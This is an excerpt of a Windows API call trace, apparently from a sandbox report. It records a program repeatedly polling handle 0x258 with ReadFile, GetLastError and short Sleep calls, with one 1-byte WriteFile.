	[0218.791] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0218.791] GetLastError () returned 0x218
	[0218.791] Sleep (dwMilliseconds=0xa) 
	[0218.815] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0218.815] GetLastError () returned 0x218
	[0218.815] Sleep (dwMilliseconds=0xa) 
	[0218.838] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0218.838] GetLastError () returned 0x218
	[0218.838] Sleep (dwMilliseconds=0xa) 
	[0218.853] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0218.853] GetLastError () returned 0x218
	[0218.853] Sleep (dwMilliseconds=0xa) 
	[0218.869] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0218.870] GetLastError () returned 0x218
	[0218.870] Sleep (dwMilliseconds=0xa) 
	[0218.884] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0218.884] GetLastError () returned 0x218
	[0218.884] Sleep (dwMilliseconds=0xa) 
	[0218.900] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0218.900] GetLastError () returned 0x218
	[0218.900] Sleep (dwMilliseconds=0xa) 
	[0218.916] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0218.916] GetLastError () returned 0x218
	[0218.916] Sleep (dwMilliseconds=0xa) 
	[0218.964] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0218.964] GetLastError () returned 0x218
	[0218.964] Sleep (dwMilliseconds=0xa) 
	[0219.092] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0219.092] GetLastError () returned 0x218
	[0219.092] Sleep (dwMilliseconds=0xa) 
	[0219.774] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0219.774] GetLastError () returned 0x218
	[0219.774] Sleep (dwMilliseconds=0xa) 
	[0219.833] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0219.833] GetLastError () returned 0x218
	[0219.833] Sleep (dwMilliseconds=0xa) 
	[0219.836] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0219.836] GetLastError () returned 0x218
	[0219.836] Sleep (dwMilliseconds=0xa) 
	[0219.852] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0219.852] GetLastError () returned 0x218
	[0219.852] Sleep (dwMilliseconds=0xa) 
	[0219.867] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0219.867] GetLastError () returned 0x218
	[0219.867] Sleep (dwMilliseconds=0xa) 
	[0219.883] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0219.883] GetLastError () returned 0x218
	[0219.883] Sleep (dwMilliseconds=0xa) 
	[0219.899] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0219.899] GetLastError () returned 0x218
	[0219.899] Sleep (dwMilliseconds=0xa) 
	[0219.914] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0219.914] GetLastError () returned 0x218
	[0219.914] Sleep (dwMilliseconds=0xa) 
	[0219.930] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0219.931] GetLastError () returned 0x218
	[0219.931] Sleep (dwMilliseconds=0xa) 
	[0219.977] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0219.977] GetLastError () returned 0x218
	[0219.977] Sleep (dwMilliseconds=0xa) 
	[0220.024] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.024] GetLastError () returned 0x218
	[0220.024] Sleep (dwMilliseconds=0xa) 
	[0220.052] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.052] GetLastError () returned 0x218
	[0220.053] Sleep (dwMilliseconds=0xa) 
	[0220.055] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.055] GetLastError () returned 0x218
	[0220.055] Sleep (dwMilliseconds=0xa) 
	[0220.070] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.070] GetLastError () returned 0x218
	[0220.070] Sleep (dwMilliseconds=0xa) 
	[0220.086] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.087] GetLastError () returned 0x218
	[0220.087] Sleep (dwMilliseconds=0xa) 
	[0220.102] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.102] GetLastError () returned 0x218
	[0220.102] Sleep (dwMilliseconds=0xa) 
	[0220.118] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.118] GetLastError () returned 0x218
	[0220.118] Sleep (dwMilliseconds=0xa) 
	[0220.133] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.133] GetLastError () returned 0x218
	[0220.133] Sleep (dwMilliseconds=0xa) 
	[0220.149] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.149] GetLastError () returned 0x218
	[0220.149] Sleep (dwMilliseconds=0xa) 
	[0220.258] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.258] GetLastError () returned 0x218
	[0220.258] Sleep (dwMilliseconds=0xa) 
	[0220.304] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.304] GetLastError () returned 0x218
	[0220.304] Sleep (dwMilliseconds=0xa) 
	[0220.329] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.329] GetLastError () returned 0x218
	[0220.329] Sleep (dwMilliseconds=0xa) 
	[0220.336] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.336] GetLastError () returned 0x218
	[0220.336] Sleep (dwMilliseconds=0xa) 
	[0220.351] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.351] GetLastError () returned 0x218
	[0220.351] Sleep (dwMilliseconds=0xa) 
	[0220.367] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.367] GetLastError () returned 0x218
	[0220.367] Sleep (dwMilliseconds=0xa) 
	[0220.383] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.383] GetLastError () returned 0x218
	[0220.383] Sleep (dwMilliseconds=0xa) 
	[0220.401] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.401] GetLastError () returned 0x218
	[0220.401] Sleep (dwMilliseconds=0xa) 
	[0220.414] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.414] GetLastError () returned 0x218
	[0220.414] Sleep (dwMilliseconds=0xa) 
	[0220.431] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.431] GetLastError () returned 0x218
	[0220.431] Sleep (dwMilliseconds=0xa) 
	[0220.476] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.476] GetLastError () returned 0x218
	[0220.476] Sleep (dwMilliseconds=0xa) 
	[0220.523] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.523] GetLastError () returned 0x218
	[0220.523] Sleep (dwMilliseconds=0xa) 
	[0220.569] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.569] GetLastError () returned 0x218
	[0220.569] Sleep (dwMilliseconds=0xa) 
	[0220.585] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.585] GetLastError () returned 0x218
	[0220.585] Sleep (dwMilliseconds=0xa) 
	[0220.602] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.602] GetLastError () returned 0x218
	[0220.602] Sleep (dwMilliseconds=0xa) 
	[0220.617] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.617] GetLastError () returned 0x218
	[0220.617] Sleep (dwMilliseconds=0xa) 
	[0220.653] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.653] GetLastError () returned 0x218
	[0220.653] Sleep (dwMilliseconds=0xa) 
	[0220.662] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.663] GetLastError () returned 0x218
	[0220.663] Sleep (dwMilliseconds=0xa) 
	[0220.678] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.678] GetLastError () returned 0x218
	[0220.678] Sleep (dwMilliseconds=0xa) 
	[0220.726] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.726] GetLastError () returned 0x218
	[0220.726] Sleep (dwMilliseconds=0xa) 
	[0220.771] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.771] GetLastError () returned 0x218
	[0220.771] Sleep (dwMilliseconds=0xa) 
	[0220.867] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.867] GetLastError () returned 0x218
	[0220.867] Sleep (dwMilliseconds=0xa) 
	[0220.881] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.881] GetLastError () returned 0x218
	[0220.882] Sleep (dwMilliseconds=0xa) 
	[0220.897] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.897] GetLastError () returned 0x218
	[0220.898] Sleep (dwMilliseconds=0xa) 
	[0220.913] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.913] GetLastError () returned 0x218
	[0220.913] Sleep (dwMilliseconds=0xa) 
	[0220.928] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.928] GetLastError () returned 0x218
	[0220.929] Sleep (dwMilliseconds=0xa) 
	[0220.944] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.944] GetLastError () returned 0x218
	[0220.944] Sleep (dwMilliseconds=0xa) 
	[0220.960] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0220.960] GetLastError () returned 0x218
	[0220.960] Sleep (dwMilliseconds=0x3e8) 
	[0221.989] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0221.989] Sleep (dwMilliseconds=0xa) 
	[0222.025] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.026] GetLastError () returned 0x218
	[0222.026] Sleep (dwMilliseconds=0xa) 
	[0222.035] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.035] GetLastError () returned 0x218
	[0222.036] Sleep (dwMilliseconds=0xa) 
	[0222.051] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.051] GetLastError () returned 0x218
	[0222.051] Sleep (dwMilliseconds=0xa) 
	[0222.067] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.067] GetLastError () returned 0x218
	[0222.067] Sleep (dwMilliseconds=0xa) 
	[0222.082] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.083] GetLastError () returned 0x218
	[0222.083] Sleep (dwMilliseconds=0xa) 
	[0222.098] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.098] GetLastError () returned 0x218
	[0222.098] Sleep (dwMilliseconds=0xa) 
	[0222.114] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.114] GetLastError () returned 0x218
	[0222.114] Sleep (dwMilliseconds=0xa) 
	[0222.130] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.130] GetLastError () returned 0x218
	[0222.130] Sleep (dwMilliseconds=0xa) 
	[0222.176] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.176] GetLastError () returned 0x218
	[0222.176] Sleep (dwMilliseconds=0xa) 
	[0222.222] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.222] GetLastError () returned 0x218
	[0222.223] Sleep (dwMilliseconds=0xa) 
	[0222.251] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.251] GetLastError () returned 0x218
	[0222.251] Sleep (dwMilliseconds=0xa) 
	[0222.254] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.254] GetLastError () returned 0x218
	[0222.254] Sleep (dwMilliseconds=0xa) 
	[0222.270] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.270] GetLastError () returned 0x218
	[0222.270] Sleep (dwMilliseconds=0xa) 
	[0222.286] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.286] GetLastError () returned 0x218
	[0222.286] Sleep (dwMilliseconds=0xa) 
	[0222.302] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.302] GetLastError () returned 0x218
	[0222.302] Sleep (dwMilliseconds=0xa) 
	[0222.318] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.318] GetLastError () returned 0x218
	[0222.319] Sleep (dwMilliseconds=0xa) 
	[0222.333] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.333] GetLastError () returned 0x218
	[0222.334] Sleep (dwMilliseconds=0xa) 
	[0222.348] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0222.348] GetLastError () returned 0x218
	[0222.349] Sleep (dwMilliseconds=0xa) 
